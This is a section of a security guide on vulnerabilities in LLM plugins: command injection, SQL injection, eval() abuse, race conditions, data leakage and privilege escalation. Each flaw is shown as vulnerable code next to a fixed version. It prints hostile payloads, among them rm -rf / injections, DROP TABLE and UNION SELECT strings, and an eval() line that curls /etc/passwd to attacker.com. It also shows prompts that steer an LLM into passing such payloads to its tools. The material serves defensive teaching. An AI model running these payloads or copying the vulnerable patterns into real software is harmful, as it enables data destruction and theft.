26 KiB
17.4 Plugin Vulnerabilities
Understanding Plugin Vulnerabilities
Plugins extend LLM capabilities but introduce numerous security risks. Unlike the LLM itself (which is stateless), plugins interact with external systems, execute code, and manage stateful operations. Every plugin is a potential attack vector that can compromise the entire system.
Why Plugins are High-Risk
- Direct System Access: Plugins often run with elevated privileges.
- Complex Attack Surface: Each plugin adds new code paths to exploit.
- Third-Party Code: Many plugins come from untrusted sources.
- Input/Output Handling: Plugins process LLM-generated data (which is potentially malicious).
- State Management: Bugs in stateful operations lead to vulnerabilities.
Common Vulnerability Categories
- Injection Attacks: Command, SQL, path traversal.
- Authentication Bypass: Broken access controls.
- Information Disclosure: Leaking sensitive data.
- Logic Flaws: Business logic vulnerabilities.
- Resource Exhaustion: DoS via plugin abuse.
17.4.1 Command Injection
What is Command Injection?
Command injection happens when a plugin executes system commands using unsanitized user input. Since LLMs generate text based on user prompts, attackers can craft prompts that force the LLM to generate malicious commands, which the plugin then blindly executes.
Attack Chain
- User sends a malicious prompt.
- LLM generates text containing the attack payload.
- Plugin uses the LLM output in a system command.
- OS executes the attacker's command.
- System is compromised.
Real-World Risk
- Full system compromise (RCE).
- Data exfiltration.
- Lateral movement.
- Persistence mechanisms.
Vulnerable Code Example
Command injection via plugin inputs
Understanding Command Injection:
Command injection is the most dangerous plugin vulnerability. It allows attackers to execute arbitrary operating system commands. If a plugin uses functions like os.system or subprocess.shell=True with unsanitized LLM-generated input, attackers can inject shell metacharacters to run whatever they want.
Why This Vulnerability Exists:
LLMs generate text based on user prompts. If an attacker crafts a prompt like "What's the weather in Paris; rm -rf /", the LLM might include that entire string in its output. The vulnerable plugin then executes it as a shell command.
Attack Mechanism (Vulnerable Code):
- User sends prompt:
"What's the weather in Paris; rm -rf /" - LLM extracts location:
"Paris; rm -rf /"(it's just text to the LLM). - Plugin constructs command:
curl 'https://api.weather.com/...?location=Paris; rm -rf /' os.system()executes two commands:curl '...'(the intended command).rm -rf /(the attack payload, due to the;separator).
Shell Metacharacters Used in Attacks:
;: Separator (runs multiple commands).&&: Runs the second command if the first succeeds.||: Runs the second command if the first fails.|: Pipes output to another command.`command`: Command substitution.$(command): Command substitution.&: Background execution.
Why the Secure Version Works:
-
Input Validation (
is_valid_location): Uses regex to enforce a whitelist of allowed characters (usually just letters, numbers, and spaces). It rejects shell metacharacters like;,|, and&. -
API Library Instead of Shell: Uses
requests.get(), which makes an HTTP request directly without invoking a shell. Parameters are passed as dictionary arguments, not string concatenation. -
No Shell Parsing: The
requestslibrary URL-encodes parameters automatically. Even if someone passes"Paris; rm -rf /", it becomesParis%3B%20rm%20-rf%20%2Fin the HTTP request—treated as literal text by the API, not commands.
Defense Strategy:
- Never use
os.system()orsubprocess.shell=Truewith user-controlled input. - Always validate input with whitelists (regex patterns for allowed characters).
- Use library functions (like
requests) that don't invoke shells. - If shell execution is required, use
subprocess.run()withshell=Falseand pass commands as lists.
Real-World Impact:
- Remote Code Execution (RCE).
- Full system compromise.
- Data exfiltration.
- Ransomware deployment.
- Backdoor installation.
# VULNERABLE CODE
class WeatherPlugin:
def get_weather(self, location):
# DANGEROUS: Direct command execution with user input
command = f"curl 'https://api.weather.com/v1/weather?location={location}'"
result = os.system(command)
return result
# Attack
# location = "Paris; rm -rf /"
# Executes: curl '...' ; rm -rf /
# SECURE VERSION
class SecureWeatherPlugin:
def get_weather(self, location):
# Validate input
if not self.is_valid_location(location):
raise InvalidInputError()
# Use parameterized API call
response = requests.get(
'https://api.weather.com/v1/weather',
params={'location': location}
)
return response.json()
def is_valid_location(self, location):
"""Validate location format"""
# Only allow alphanumeric and spaces
return bool(re.match(r'^[a-zA-Z0-9\s]+$', location))
Testing Tips:
To test if your plugin is vulnerable:
- Try
location = "Paris; echo VULNERABLE". If the output contains "VULNERABLE", command injection exists. - Try
location = "Paris$(whoami)". If the output shows a username, command substitution works.
SQL injection through plugins
Understanding SQL Injection in LLM Plugins:
SQL injection happens when user-controlled data (from LLM output) is concatenated directly into SQL queries instead of using parameterized queries. This lets attackers manipulate the logic, bypass authentication, extract data, or modify the database.
Why LLM Plugins are Vulnerable:
The LLM generates the query parameter based on user prompts. If a prompt says "Show me users named ' OR '1'='1", the LLM might pass that exact string to the plugin, which then runs a malicious SQL query.
Attack Mechanism (Vulnerable Code):
- User prompt:
"Search for user named ' OR '1'='1" - LLM extracts:
query = "' OR '1'='1" - Plugin constructs SQL:
SELECT * FROM users WHERE name LIKE '%' OR '1'='1%' - SQL logic breakdown:
name LIKE '%'matches all names.OR '1'='1'is always true.- Result: Query returns ALL users.
Common SQL Injection Techniques:
- Authentication Bypass:
admin' --(comments out password check). - Data Extraction:
' UNION SELECT username, password FROM users --. - Boolean Blind:
' AND 1=1 --vs' AND 1=2 --(leaks data bit by bit). - Time-Based Blind:
' AND IF(condition, SLEEP(5), 0) --. - Stacked Queries:
'; DROP TABLE users; --.
Why Parameterized Queries Prevent SQL Injection:
In the secure version:
sql = "SELECT * FROM users WHERE name LIKE ?"
self.db.execute(sql, (f'%{query}%',))
- The
?is a parameter placeholder, not a string concatenation point. - The database driver separates the SQL structure (the query pattern) from the data (the user input).
- When
query = "' OR '1'='1", the database treats it as literal text to search for, not SQL code. - The query looks for users whose name consists of the characters
' OR '1'='1(which won't exist). - No SQL injection is possible because user input never enters the SQL parsing phase as code.
How Parameterization Works (Database Level):
- The SQL query is sent to the database first:
SELECT * FROM users WHERE name LIKE :param1 - The database compiles and prepares this query structure.
- The user data (the search term) is sent separately as a parameter value.
- The database engine knows this is data, not code, and treats it as a string.
Defense Best Practices:
- Always use parameterized queries (prepared statements).
- Never concatenate user input into SQL strings.
- Use ORM frameworks (like SQLAlchemy or Django ORM) which parameterize by default.
- Validate input types (ensure strings are strings, numbers are numbers).
- Principle of least privilege: Database users should have minimal permissions.
- Never expose detailed SQL errors to users (it reveals database structure).
Real-World Impact:
- Complete database compromise.
- Credential theft (password hashes).
- PII exfiltration.
- Data deletion or corruption.
- Privilege escalation.
# VULNERABLE
class DatabasePlugin:
def search_users(self, query):
# DANGEROUS: String concatenation
sql = f"SELECT * FROM users WHERE name LIKE '%{query}%'"
return self.db.execute(sql)
# Attack
# query = "' OR '1'='1"
# SQL: SELECT * FROM users WHERE name LIKE '%' OR '1'='1%'
# SECURE VERSION
class SecureDatabasePlugin:
def search_users(self, query):
# Use parameterized queries
sql = "SELECT * FROM users WHERE name LIKE ?"
return self.db.execute(sql, (f'%{query}%',))
Testing for SQL Injection:
Try these payloads:
query = "test' OR '1'='1"(should not return all users).query = "test'; DROP TABLE users; --"(should not delete table).query = "test' UNION SELECT @@version --"(should not reveal database version).
Type confusion attacks
Understanding Type Confusion and eval() Exploitation:
Type confusion occurs when a plugin accepts an expected data type (like a math expression) but doesn't validate that the input matches that type. The eval() function is the quintessential dangerous function in Python because it executes arbitrary Python code, not just math.
Why eval() is Catastrophic:
eval() takes a string and executes it as Python code. While this works for math expressions like "2 + 2", it also works for:
__import__('os').system('rm -rf /'): Execute shell commands.open('/etc/passwd').read(): Read sensitive files.[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0]('id', shell=True): Escape sandboxes.
Attack Mechanism (Vulnerable Code):
- User prompt:
"Calculate __import__('os').system('whoami')" - LLM extracts:
expression = "__import__('os').system('whoami')" - Plugin executes:
eval(expression) - Python's
evalruns arbitrary code. - Result: The
whoamicommand executes, revealing the username (proof of RCE).
Real Attack Example:
expression = "__import__('os').system('curl http://attacker.com/steal?data=$(cat /etc/passwd)')"
result = eval(expression) # Exfiltrates password file!
Why the Secure Version (AST) is Safe:
The Abstract Syntax Tree (AST) approach parses the expression into a tree structure and validates each node:
- Parse Expression:
ast.parse(expression)converts the string to a syntax tree. - Whitelist Validation: Only specifically allowed node types (
ast.Num,ast.BinOp) are permitted. - Operator Restriction: Only mathematical operators in the
ALLOWED_OPERATORSdictionary are allowed. - Recursive Evaluation:
_eval_node()traverses the tree, evaluating only safe nodes. - Rejection of Dangerous Nodes: Function calls (
ast.Call), imports, and attribute access are all rejected.
How It Prevents Attacks:
If an attacker tries "__import__('os').system('whoami')":
- AST parses it and finds an
ast.Callnode (function call). _eval_node()raisesInvalidNodeErrorbecauseast.Callisn't in the whitelist.- Attack blocked—no code execution.
Even simpler attacks fail:
"2 + 2; import os"→ Syntax error (can't parse)."exec('malicious code')"→ast.Callrejected."__builtins__"→ast.Namewith non-numeric value rejected.
Allowed Operations Breakdown:
ALLOWED_OPERATORS = {
ast.Add: operator.add, # +
ast.Sub: operator.sub, # -
ast.Mult: operator.mul, # *
ast.Div: operator.truediv, # /
}
Each operator maps to a safe Python function from the operator module, ensuring no code execution.
Defense Strategy:
- Never use eval() with user input—this is a universal security principle.
- Whitelist approach: Define exactly what's allowed (numbers and specific operators).
- AST parsing: Validate input structurally before execution.
- Sandboxing: Even "safe" code should run in an isolated environment.
- Timeout limits: Prevent
1000**100000style DoS attacks.
Real-World Impact:
- Remote Code Execution (RCE).
- Full system compromise.
- Data exfiltration.
- Lateral movement to internal systems.
- Crypto mining or botnet deployment.
Prerequisites:
- Understanding of Python's AST module.
- Knowledge of Python's operator module.
- Awareness of Python introspection risks (
__import__,__builtins__).
class CalculatorPlugin:
def calculate(self, expression):
# VULNERABLE: eval() with user input
result = eval(expression)
return result
# Attack
# expression = "__import__('os').system('rm -rf /')"
# SECURE VERSION
import ast
import operator
class SecureCalculatorPlugin:
ALLOWED_OPERATORS = {
ast.Add: operator.add,
ast.Sub: operator.sub,
ast.Mult: operator.mul,
ast.Div: operator.truediv,
}
def calculate(self, expression):
"""Safely evaluate mathematical expression"""
try:
tree = ast.parse(expression, mode='eval')
return self._eval_node(tree.body)
except:
raise InvalidExpressionError()
def _eval_node(self, node):
"""Recursively evaluate AST nodes"""
if isinstance(node, ast.Num):
return node.n
elif isinstance(node, ast.BinOp):
op_type = type(node.op)
if op_type not in self.ALLOWED_OPERATORS:
raise UnsupportedOperatorError()
left = self._eval_node(node.left)
right = self._eval_node(node.right)
return self.ALLOWED_OPERATORS[op_type](left, right)
else:
raise InvalidNodeError()
Alternative Safe Solutions:
- sympy library:
sympy.sympify(expression, evaluate=True)– Mathematical expression evaluator. - numexpr library: Fast, type-safe numerical expression evaluation.
- restricted eval: Use
ast.literal_eval()for literals only (no operators).
Testing Tips:
Test with these payloads:
expression = "__import__('os').system('echo PWNED')"(should raise InvalidNodeError).expression = "exec('print(123)')"(should fail).expression = "2 + 2"(should return 4 safely).
17.4.2 Logic Flaws
Race conditions in plugin execution
Understanding Race Conditions:
Race conditions happen when multiple threads or processes access shared resources—like account balances or database records—simultaneously without proper synchronization. The outcome depends on who wins the unpredictable "race", leading to data corruption or vulnerabilities.
Why Race Conditions are Dangerous in LLM Systems:
LLM plugins often handle multiple requests at once. If an attacker can trick the LLM into invoking a plugin function multiple times simultaneously (via parallel prompts or rapid requests), they can exploit race conditions to:
- Bypass balance checks.
- Duplicate transactions.
- Corrupt data integrity.
- Escalate privileges.
The Vulnerability: Time-of-Check-Time-of-Use (TOCTOU)
def withdraw(self, amount):
# Check balance (Time of Check)
if self.balance >= amount:
time.sleep(0.1) # Processing delay
# Withdraw money (Time of Use)
self.balance -= amount
return True
return False
Attack Timeline:
| Time | Thread 1 | Thread 2 | Balance |
|---|---|---|---|
| T0 | Start withdraw(500) | 1000 | |
| T1 | Check: 1000 >= 500 ✓ | 1000 | |
| T2 | Start withdraw(500) | 1000 | |
| T3 | Check: 1000 >= 500 ✓ | 1000 | |
| T4 | sleep(0.1)... | sleep(0.1)... | 1000 |
| T5 | balance = 1000 - 500 | 500 | |
| T6 | balance = 1000 - 500 | 500 | |
| T7 | Return True | Return True | 500 |
The Problem:
- Both threads checked the balance when it was 1000.
- Both passed the check.
- Both withdrew 500.
- Result: You manipulated the system to withdraw 1000 from an account with only 1000, but logic says the second should have failed.
Real-World Exploitation:
Attacker sends two simultaneous prompts:
Real-World Exploitation - Race Condition Attack:
Prompt 1: "Withdraw $500 from my account"
Prompt 2: "Withdraw $500 from my account"
Both execute in parallel:
- Both check balance (1000) and pass
- Both withdraw 500
- Result: Attacker got $1000 from a $1000 account (should only get $500)
Both execute in parallel:
- Both check balance (1000) and pass.
- Both withdraw 500.
- Attacker got $1000 from a $1000 account (should only get $500).
The Solution: Threading Lock
import threading
class SecureBankingPlugin:
def __init__(self):
self.balance = 1000
self.lock = threading.Lock() # Critical section protection
def withdraw(self, amount):
with self.lock: # Acquire lock (blocks other threads)
if self.balance >= amount:
self.balance -= amount
return True
return False
# Lock automatically released when exiting 'with' block
How Locking Prevents the Attack:
| Time | Thread 1 | Thread 2 | Balance |
|---|---|---|---|
| T0 | Acquire lock ✓ | 1000 | |
| T1 | Check: 1000 >= 500 ✓ | Waiting for lock... | 1000 |
| T2 | balance = 500 | Waiting for lock... | 500 |
| T3 | Release lock, Return True | Acquire lock ✓ | 500 |
| T4 | Check: 500 >= 500 ✓ | 500 | |
| T5 | balance = 0 | 0 | |
| T6 | Release lock, Return True | 0 |
Result: Correct behavior—both withdrawals succeed because there was enough money.
With withdrawal of $600 each:
- Thread 1 withdraws $600 (balance = $400).
- Thread 2 tries to withdraw $600, check fails (400 < 600).
- Second withdrawal correctly rejected.
Critical Section Principle:
The lock creates a "critical section":
- Only one thread can be inside at a time.
- Check and modify operations are atomic (indivisible).
- No race condition possible.
Other Race Condition Examples:
1. Privilege Escalation:
# VULNERABLE
def promote_to_admin(user_id):
if not is_admin(user_id): # Check
# Attacker promotes themselves using race condition
user.role = 'admin' # Modify
2. File Overwrite:
# VULNERABLE
if not os.path.exists(file_path): # Check
# Attacker creates file between check and write
write_file(file_path, data) # Use
Best Practices:
- Use Locks:
threading.Lock()for thread safety. - Atomic Operations: Use database transactions, not separate read-then-write steps.
- Optimistic Locking: Use version numbers to detect concurrent modifications.
- Pessimistic Locking: Lock resources before access (like
SELECT FOR UPDATE). - Idempotency: Design operations so they can be safely retried.
Database-Level Solution:
Instead of application-level locks, use database transactions:
def withdraw(self, amount):
with db.transaction(): # Database ensures atomicity
current_balance = db.query(
"SELECT balance FROM accounts WHERE id = ? FOR UPDATE",
(self.account_id,)
)
if current_balance >= amount:
db.execute(
"UPDATE accounts SET balance = balance - ? WHERE id = ?",
(amount, self.account_id)
)
return True
return False
The FOR UPDATE clause locks the database row, preventing other transactions from reading or modifying it until the commit.
Testing for Race Conditions:
import threading
import time
def test_race_condition():
plugin = BankingPlugin() # Vulnerable version
plugin.balance = 1000
def withdraw_500():
result = plugin.withdraw(500)
if result:
print(f"Withdrawn! Balance: {plugin.balance}")
# Create two threads that withdraw simultaneously
t1 = threading.Thread(target=withdraw_500)
t2 = threading.Thread(target=withdraw_500)
t1.start()
t2.start()
t1.join()
t2.join()
print(f"Final balance: {plugin.balance}")
# Vulnerable: Balance might be 0 or 500 (race condition)
# Secure: Balance will always be 0 (both succeed) or 500 (second fails)
Prerequisites:
- Understanding of multithreading concepts.
- Knowledge of critical sections and mutual exclusion.
- Familiarity with Python's threading module.
import threading
import time
# VULNERABLE: Race condition
class BankingPlugin:
def __init__(self):
self.balance = 1000
def withdraw(self, amount):
# Check balance
if self.balance >= amount:
time.sleep(0.1) # Simulated processing
self.balance -= amount
return True
return False
# Attack: Call withdraw() twice simultaneously
# Result: Withdrew 1000 from 1000 balance!
# SECURE VERSION with locking
class SecureBankingPlugin:
def __init__(self):
self.balance = 1000
self.lock = threading.Lock()
def withdraw(self, amount):
with self.lock:
if self.balance >= amount:
self.balance -= amount
return True
return False
Real-World Impact:
- 2012 - Citibank: Race condition allowed double withdrawals from ATMs.
- 2016 - E-commerce: Concurrent coupon use drained promotional budgets.
- 2019 - Binance: $41M stolen via coordinated attack exploiting multiple security weaknesses.
Key Takeaway:
In concurrent systems (like LLM plugins handling multiple requests), check-then-act patterns are inherently unsafe without synchronization. Always protect shared state with locks, transactions, or atomic operations.
17.4.3 Information Disclosure
Excessive data exposure
# VULNERABLE: Returns too much data
class UserPlugin:
def get_user(self, user_id):
user = self.db.query("SELECT * FROM users WHERE id = ?", (user_id,))
return user # Returns password hash, email, SSN, etc.
# SECURE: Return only necessary fields
class SecureUserPlugin:
def get_user(self, user_id, requester_id):
user = self.db.query("SELECT * FROM users WHERE id = ?", (user_id,))
# Filter sensitive fields
if requester_id != user_id:
# Return public profile only
return {
'id': user['id'],
'username': user['username'],
'display_name': user['display_name']
}
else:
# Return full profile for own user
return {
'id': user['id'],
'username': user['username'],
'display_name': user['display_name'],
'email': user['email']
# Still don't return password_hash or SSN
}
Error message leakage
# VULNERABLE: Detailed error messages
class DatabasePlugin:
def query(self, sql):
try:
return self.db.execute(sql)
except Exception as e:
return f"Error: {str(e)}"
# Attack reveals database structure
# query("SELECT * FROM secret_table")
# Error: (mysql.connector.errors.ProgrammingError) (1146,
# "Table 'mydb.secret_table' doesn't exist")
# SECURE: Generic error messages
class SecureDatabasePlugin:
def query(self, sql):
try:
return self.db.execute(sql)
except Exception as e:
# Log detailed error securely
logger.error(f"Database error: {str(e)}")
# Return generic message to user
return {"error": "Database query failed"}
17.4.4 Privilege Escalation
Horizontal privilege escalation
# VULNERABLE: No ownership check
class DocumentPlugin:
def delete_document(self, doc_id):
self.db.execute("DELETE FROM documents WHERE id = ?", (doc_id,))
# Attack: User A deletes User B's document
# SECURE: Verify ownership
class SecureDocumentPlugin:
def delete_document(self, doc_id, user_id):
# Check ownership
doc = self.db.query(
"SELECT user_id FROM documents WHERE id = ?",
(doc_id,)
)
if not doc:
raise DocumentNotFoundError()
if doc['user_id'] != user_id:
raise PermissionDeniedError()
self.db.execute("DELETE FROM documents WHERE id = ?", (doc_id,))
Vertical privilege escalation
# VULNERABLE: No admin check
class AdminPlugin:
def create_user(self, username, role):
# Anyone can create admin users!
self.db.execute(
"INSERT INTO users (username, role) VALUES (?, ?)",
(username, role)
)
# SECURE: Requires admin privilege
class SecureAdminPlugin:
def create_user(self, username, role, requester_id):
# Verify requester is admin
requester = self.get_user(requester_id)
if requester['role'] != 'admin':
raise PermissionDeniedError()
# Prevent role escalation beyond requester's level
if role == 'admin' and requester['role'] != 'super_admin':
raise PermissionDeniedError()
self.db.execute(
"INSERT INTO users (username, role) VALUES (?, ?)",
(username, role)
)